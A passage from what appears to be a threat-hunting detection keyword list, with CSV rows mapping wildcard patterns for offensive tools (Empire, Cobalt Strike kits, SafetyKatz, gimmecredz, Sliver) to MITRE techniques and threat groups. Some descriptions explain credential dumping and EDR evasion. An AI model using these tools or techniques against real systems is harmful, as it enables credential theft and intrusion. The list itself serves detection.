TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregmounteddrive*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Get-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*gexplorer.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 
- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*ggackgngljinccllcmbgnpgpllcjepgc*","greyware_tool_keyword","WindmillVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ghost_* -v*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ghost_sparc*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ghost_x86*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ghost01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*GhostInTheNet off*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*GhostInTheNet on*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*GhostInTheNet.sh *","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*GhostPack*","offensive_tool_keyword","GhostPack","A collection of security related toolsets.with known hacktools","T1055 - T1203 - T1218 - T1560","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/GhostPack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*GhostPack/ForgeCert*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority 
(CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*GhostPack/Koh*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*GhostPack/SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. 
Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" +"*GhostPack/Seatbelt*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*GhostPack/SharpDPAPI*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*Ghostpack-CompiledBinaries*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*GhostWebShell.cs*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*gimmecredz*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" +"*ginuerzh/gost*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" +"*Gioyik/getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. 
but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" +"*git log -p | scanrepo *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*github*/COMHunter/*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*github*/DeathStar*","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","10","1529","339","2022-12-08T07:44:30Z","2017-05-21T07:34:57Z" +"*github*/MoveKit.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*github*/Mr-xn/*","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - 
TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*github*/padre.git*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*github*/xmrig/xmrig*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*github.com/*Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*github.com/Arno0x*","offensive_tool_keyword","Github Username","Github username known for exploitation toos and scripts","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Arno0x","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/BishopFox*","offensive_tool_keyword","Github Username","Private professional services firm providing offensive security testing to the Fortune 500. 
serving exploitation tools on github","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/BishopFox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/bishopfox/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*github.com/dafthack*","offensive_tool_keyword","Github Username","Github user hosting exploitation tools for pentest and redteam","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/g3tsyst3m*","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*github.com/GoSecure*","offensive_tool_keyword","Github Username","github repo name containing multiple exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/GoSecure","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/k8gege*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*github.com/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*github.com/nccgroup*","offensive_tool_keyword","Github Username","github repo name hosting securty tools and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/nccgroup","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/quickbreach*","offensive_tool_keyword","Github Username","An infosec security researcher & penetration tester. hosting offensive tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/rasta-mouse/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*github.com/sensepost*","offensive_tool_keyword","Github Username","github repo of orange cyberdefense red team","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sensepost","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*github.com/SpiderLabs/*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*github.io/weakpass/generator/*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*GithubC2-main*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*gitleaks detect*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*gitleaks*","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","13901","1250","2023-10-03T15:38:08Z","2018-01-27T18:19:31Z" +"*Git-Scanner*","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Information Gathering","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","4","303","82","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z" +"*GIUDA* -askluids*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*GIUDA-main.zip*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*give_dcsync.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*gjknjjomckknofjidppipffbpoekiipm*","greyware_tool_keyword","VPN Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*gkojfkhlekighikafcpjkiklfbnlmeio*","greyware_tool_keyword","Hola Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*glassfish_war_upload_xsrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*glebarez/padre*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" +"*glit org -*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit repo *","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit user *","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit.exe org*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*glit.exe repo*","offensive_tool_keyword","glit","Retrieve all mails of 
